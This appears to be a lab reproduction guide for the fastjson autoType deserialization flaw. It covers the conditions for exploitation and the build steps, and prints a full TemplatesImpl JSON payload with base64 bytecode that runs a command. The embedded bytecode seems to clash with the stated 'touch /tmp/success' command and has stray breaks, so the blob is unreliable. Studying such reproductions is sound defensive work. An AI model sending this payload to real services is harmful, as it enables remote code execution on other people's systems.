fastjson 反序列化任意命令执行漏洞

漏洞原理

http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

https://github.com/shengqi158/fastjson-remote-code-execute-poc

In the process of parsing json, fastjson supports the use of autoType to instantiate a specific class and fills its attribute value through json. The JDK's own class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl has a private property_bytecodes, and some methods will execute the Java bytecode contained in this value.

Therefore, if you want to use the _bytecodes attribute of TemplatesImpl to execute arbitrary commands, there are several conditions:

The target website uses the fastjson library to parse json

Feature.SupportNonPublicField is set during parsing, otherwise it does not support incoming private properties.

The TemplatesImpl class exists in the jdk used by the target

Of course, it is not ruled out that there are other methods that do not require TemplatesImpl

漏洞复现

The directory structure of this environment is as follows:

src This project source code

main/java java class

IndexFilter.java web source code

Poc.java POC source code

pom.xml configuration file, using maven, you can directly compile this project into a war package

exploit.php reads compiled POC bytecode and converts it to base64

fastjson-1.0.war The packaged web environment can be directly placed under tomcat to run

生成字节码

The first step is to write a Java class and execute commands in this class. Then compile the class, get the .class file, and get the bytecode.

Modify the command you want to execute in Poc.java, and then use maven to compile this project in this directory to generate target/classes/Poc.class:

1

mvn compile

If maven is not installed, you can also use the WEB-INF/classes/Poc.class in the compressed package fastjson-1.0.war directly. This class file I have compiled is read in exploit.php.

构造POC

After generating the .class file, base64 encoding of the content of the file and place it in json at the value of _bytecodes, as follows:

1

{'@type':'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl','_bytecodes':['yv66vgAAADQANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAVMUG9jOwEACkV4Y2VwdGlvbnMHACwB AAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF 4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi 9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b 3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFj aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbGVyOylWAQAJaGF GbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy 9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAIUG9jLmphdmEMAAgACQcALwwAMAAxAQAhb3BlbiAvQXBwbGljYXRpb 25zL0NhbGN1bGF0b3IuYXBwDAAyADMBAANQb2MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2 YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABF qYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3 M7ACEABQAHAAAAAAAEACAAAAAAAAAAJAAIACgAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAAAEAAEAE AABABEAEgABAAoAABJAAAAABAAAAAAGxAAAAAAAAGALAAAAAABgABAAAAAEQAMAAAAKgAEAAAAAQANAA4AAAAAAAAEAEwAUAAAAAAABABUAFgACAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABUAFgACAAAAAAAAQAXABgAAWABEAGQACAAOAAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAFgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwA GTLEAAAACAAsAAAAKAAAAAAZAAAGAGgAMAAAAFgACAAAAACQAfACAAAAAIAIAEAIQAOAAEADwAAAAQAAQAiAAAEAIwAAAAAAAAAAAJA=='],'_name':'a.b','_tfactory':{ },'_outputProperties':{ },'_version':'1.0','allowedProtocols':'all'}

If you want to use a compiled .class file, you can directly execute php exploit.php to obtain POC:

Compiled with jdk1.8, the command executed is touch /tmp/success, so the execution will fail under Windows. Windows users please modify Poc.java by themselves and generate their own POC.

漏洞利用

The target is a web application, and the access returns "Hello world". Normally, a json is POST, and the target will extract the name and age in the json object and splice it into one sentence to return:

Send the POC obtained in step 2 and execute the command successfully:

As shown in the figure above, the /tmp/success file was successfully created.